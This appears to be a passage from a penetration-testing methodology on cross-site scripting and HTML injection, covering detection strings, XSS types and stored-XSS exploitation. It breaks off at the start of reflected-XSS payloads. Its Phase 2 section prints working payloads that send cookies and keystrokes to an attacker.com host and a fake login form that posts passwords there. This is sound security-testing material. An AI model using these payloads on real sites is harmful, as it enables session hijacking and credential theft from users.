Xss Html Injection

Technical Requirements

• Understanding of JavaScript execution in browser context
• Knowledge of HTML DOM structure and manipulation
• Familiarity with HTTP request/response headers
• Understanding of cookie attributes and session management

Legal Prerequisites

• Written authorization for security testing
• Defined scope including target domains and features
• Agreement on handling of any captured session data
• Incident response procedures established

Outputs / Deliverables

• XSS/HTMLi vulnerability report with severity classifications
• Proof-of-concept payloads demonstrating impact
• Session hijacking demonstrations (controlled environment)
• Remediation recommendations with CSP configurations

Core Workflow

Phase 1: Vulnerability Detection

Identify Input Reflection Points

Locate areas where user input is reflected in responses:

# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)

Basic Detection Testing

Insert test strings to observe application behavior:

<!-- Basic reflection test -->
<test123>

<!-- Script tag test -->
<script>alert('XSS')</script>

<!-- Event handler test -->
<img src=x onerror=alert('XSS')>

<!-- SVG-based test -->
<svg onload=alert('XSS')>

<!-- Body event test -->
<body onload=alert('XSS')>

Monitor for:

• Raw HTML reflection without encoding
• Partial encoding (some characters escaped)
• JavaScript execution in browser console
• DOM modifications visible in inspector

Determine XSS Type

Stored XSS Indicators:

• Input persists after page refresh
• Other users see injected content
• Content stored in database/filesystem

Reflected XSS Indicators:

• Input appears only in current response
• Requires victim to click crafted URL
• No persistence across sessions

DOM-Based XSS Indicators:

• Input processed by client-side JavaScript
• Server response doesn't contain payload
• Exploitation occurs entirely in browser

Phase 2: Stored XSS Exploitation

Identify Storage Locations

Target areas with persistent user content:

- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences

Craft Persistent Payloads

<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- Keylogger injection -->
<script>
document.onkeypress=function(e){
  new Image().src='http://attacker.com/log?k='+e.key;
}
</script>

<!-- Session hijacking -->
<script>
fetch('http://attacker.com/capture',{
  method:'POST',
  body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>

<!-- Phishing form injection -->
<div id="login">
<h2>Session Expired - Please Login</h2>
<form action="http://attacker.com/phish" method="POST">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</div>

Phase 3: Reflected XSS Exploitation

Construct Malicious URLs

Build URLs containing XSS payloads:

# Basic reflected payload